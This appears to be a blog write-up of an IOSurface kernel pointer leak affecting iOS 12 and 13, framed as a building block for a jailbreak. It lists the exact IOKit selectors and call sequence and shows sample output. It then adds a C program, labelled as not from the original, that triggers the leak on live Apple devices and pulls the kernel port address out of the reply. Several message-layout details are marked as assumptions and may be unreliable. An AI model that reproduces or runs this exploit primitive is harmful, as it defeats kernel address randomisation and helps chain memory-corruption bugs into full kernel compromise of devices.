Here we are going to talk about an important bug that is still present in iOS 13.3.1 beta 2. It has been triggered on the latest public release, iOS 13.3, and is reported to affect devices running iOS 12 and iOS 13, so it could become one of the building blocks of an iOS 13 jailbreak in the near future.
At first glance many people dismiss this as a minor bug, but on closer inspection it matters more than it looks. To be precise, it is a kernel information leak, not a fully-fledged kernel exploit: on its own it grants the user no extra privilege at all. What it does is hand userland a kernel pointer, and that is exactly what a jailbreak developer needs to turn a separate memory corruption bug into a reliable exploit. The kernel randomizes its addresses (KASLR), so without a leak an exploit has to guess where kernel objects live; with one, the developer knows where to aim and can modify the kernel deliberately, in combination with other bugs, instead of crashing the device by accident.
Everything a user, tester or developer runs lives in userland. The kernel runs at a higher privilege level, holds every right the system has, and decides what userland, and therefore the device owner, is allowed to do.
Users can use the kernel's services but have no control over it. To build a jailbreak, a developer has to obtain access to the kernel that the system never intended to give, and with this bug the kernel itself hands over the first key: it tells userland where one of its own objects is in memory. Without something like this, a device can only run the applications Apple allows through the App Store.
Without such a bug, the user has no way to launch or terminate arbitrary processes, or to inject anything such as tweaks and themes into iOS.
As explained above, this bug exposes a kernel memory address to userland: the kernel address of the mach port object that the user passed in. Knowing where a port lives in kernel memory is a classic starting point for jailbreaks, because together with an additional memory corruption bug a port can be turned into a fake kernel task port, which gives kernel memory read and write, the well-known TFP0 (task_for_pid(0)).
Once that point is reached, the user has full control over the iOS kernel and can install tweaks, themes, TaigOne, or a complete jailbreak. What exploit developers needed was something to breach the wall, and this bug opens the first crack in it.
Now let's trigger it.
I chose IOSurface because that’s available in the contexts most people care about (3rd party app container and WebContent), and exists both on iOS and macOS.
The trigger itself is short. In principle any IOKit user client that your process is allowed to open could serve as the vehicle; IOSurface is the one walked through here.
After the usual IOSurface setup (creation of the userclient and surface), all you have to do is:
- Call setNotify (external method 17) with one of the async functions and pass it a mach port.
- Call incrementUseCount followed by decrementUseCount (methods 14 and 15 respectively) - I have no idea what they’re really intended for, but if the count they operate on hits zero, a message is sent back to userland.
- Receive a message on your mach port and enjoy your free kernel pointer.
```
port: 100b, (os/kern) successful
client: 1707, (os/kern) successful
newSurface: 1b, (os/kern) successful
setNotify: (os/kern) successful
incrementUseCount: (os/kern) successful
decrementUseCount: (os/kern) successful
mach_msg: (os/kern) successful
port addr: 0xffffff8070c57808
```
The last line is the leaked value: the kernel address of the mach port you passed to setNotify, obtained with nothing more than a few IOKit calls. Note that the value shown has the shape of a macOS (x86_64) kernel address; on an arm64 iPhone the leaked address will look different, but the mechanism is the same. That pointer alone does not jailbreak anything, but it is the kind of information an exploit developer needs to turn a separate memory corruption bug into a full kernel exploit and, from there, into TFP0 and a jailbreak. The leak is reported to work on the latest public release, iOS 13.3.
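The sequence above, written out in C as an added example that is not code from the original page or from the bug's finder. The portable part parses a received IOKit async notification and picks the kernel pointer out of its reference array; the Apple-only part at the bottom performs the setNotify / incrementUseCount / decrementUseCount / mach_msg sequence against a user client and surface id that the caller obtained from the usual IOSurface setup (which the page does not detail). Assumptions, not stated on the page: the message layout is taken from IOKit's OSMessageNotification.h (mach_msg_header_t followed by OSNotificationHeader64 with eight 64-bit reference slots), the leaked port address is expected in reference slot 0 (the slot IOKit reserves for the wake port), the surface id is passed as the single scalar argument to each call, and the sample message is constructed here for offline use, seeded with the address printed on the page.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Assumed wire layout (IOKit OSMessageNotification.h):
 *   mach_msg_header_t       24 bytes
 *   OSNotificationHeader64  uint32_t size; uint32_t type; uint64_t reference[8];
 *   IOAsyncCompletionContent follows
 * reference[0]: wake-port slot reserved by IOKit (where the leak is assumed to land)
 * reference[1]: user callback, reference[2]: user refcon. */
#define MACH_HDR_SIZE     24u
#define NOTIFY_HDR_SIZE   8u
#define ASYNC_REF_COUNT   8u
#define REFERENCE_OFFSET  (MACH_HDR_SIZE + NOTIFY_HDR_SIZE)
#define MIN_MSG_SIZE      (REFERENCE_OFFSET + ASYNC_REF_COUNT * 8u)

/* Heuristic: XNU kernel pointers (x86_64 0xffffff80..., arm64 0xffffffe0.../0xfffffff0...)
 * have the top 24 bits set and are 8-byte aligned; user pointers never look like that. */
static int looks_like_kernel_pointer(uint64_t v)
{
    return (v >> 40) == 0xffffffu && v != UINT64_MAX && (v & 7u) == 0;
}

static uint64_t read_u64(const uint8_t *p) { uint64_t v; memcpy(&v, p, sizeof v); return v; }

/* Scan the reference array of a received notification for a kernel pointer.
 * Returns the slot index (0..7) and stores the value in *out, or -1 if none/too short. */
static int extract_leaked_pointer(const uint8_t *msg, size_t len, uint64_t *out)
{
    if (len < MIN_MSG_SIZE) return -1;
    for (unsigned i = 0; i < ASYNC_REF_COUNT; i++) {
        uint64_t v = read_u64(msg + REFERENCE_OFFSET + i * 8u);
        if (looks_like_kernel_pointer(v)) { *out = v; return (int)i; }
    }
    return -1;
}

/* Constructed sample: what a leaking reply would carry (msgh_size + reference array). */
static size_t build_sample_message(uint8_t *buf, size_t cap, uint64_t leaked_port_addr)
{
    if (cap < MIN_MSG_SIZE) return 0;
    memset(buf, 0, MIN_MSG_SIZE);
    uint32_t size = MIN_MSG_SIZE;
    memcpy(buf + 4, &size, sizeof size);             /* msgh_size */
    uint64_t refs[ASYNC_REF_COUNT] = {0};
    refs[0] = leaked_port_addr;                      /* kernel ipc_port address: the leak */
    refs[1] = 0x0000000100004000ull;                 /* user callback, ordinary user pointer */
    refs[2] = 0x4141414141414141ull;                 /* user refcon */
    memcpy(buf + REFERENCE_OFFSET, refs, sizeof refs);
    return MIN_MSG_SIZE;
}

/* Offline demo: build the sample (seeded with the page's value) and extract from it. */
static uint64_t demo_leaked_value(void)
{
    uint8_t buf[256];
    size_t n = build_sample_message(buf, sizeof buf, 0xffffff8070c57808ull);
    uint64_t leaked = 0;
    return extract_leaked_pointer(buf, n, &leaked) == 0 ? leaked : 0;
}

#ifdef __APPLE__
#include <mach/mach.h>
#include <IOKit/IOKitLib.h>

enum { kSetNotify = 17, kIncrementUseCount = 14, kDecrementUseCount = 15 }; /* selectors from the page */

/* Live trigger: caller supplies the IOSurfaceRoot user client and surface id. */
static kern_return_t leak_port_pointer(io_connect_t client, uint32_t surface_id, uint64_t *out)
{
    mach_port_t port = MACH_PORT_NULL;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    if (kr != KERN_SUCCESS) return kr;
    uint64_t ref[ASYNC_REF_COUNT] = {0};
    ref[1] = 0x4141414141414141ull;                  /* callback slot; never dispatched here */
    uint64_t in[1] = { surface_id };                 /* assumption: surface id as scalar input */
    kr = IOConnectCallAsyncMethod(client, kSetNotify, port, ref, ASYNC_REF_COUNT,
                                  in, 1, NULL, 0, NULL, NULL, NULL, NULL);
    if (kr != KERN_SUCCESS) return kr;
    kr = IOConnectCallScalarMethod(client, kIncrementUseCount, in, 1, NULL, NULL);
    if (kr != KERN_SUCCESS) return kr;
    kr = IOConnectCallScalarMethod(client, kDecrementUseCount, in, 1, NULL, NULL);
    if (kr != KERN_SUCCESS) return kr;
    _Alignas(8) uint8_t buf[1024] = {0};             /* count hit zero: reply arrives on our port */
    mach_msg_header_t *hdr = (mach_msg_header_t *)buf;
    kr = mach_msg(hdr, MACH_RCV_MSG | MACH_RCV_TIMEOUT, 0, sizeof buf, port, 1000, MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) return kr;
    return extract_leaked_pointer(buf, hdr->msgh_size, out) >= 0 ? KERN_SUCCESS : KERN_FAILURE;
}
#endif

int main(void)
{
    uint64_t v = demo_leaked_value();
    printf("port addr: 0x%llx\n", (unsigned long long)v);
    return v ? 0 : 1;
}
```

On a Mac or iOS device, call leak_port_pointer() with the client and surface id from your own setup; everywhere else the program only exercises the parser on the constructed message. The kernel-pointer heuristic is deliberately loose so the same check works for x86_64 and arm64 kernels; tighten it to the address range of the target if you need fewer false positives.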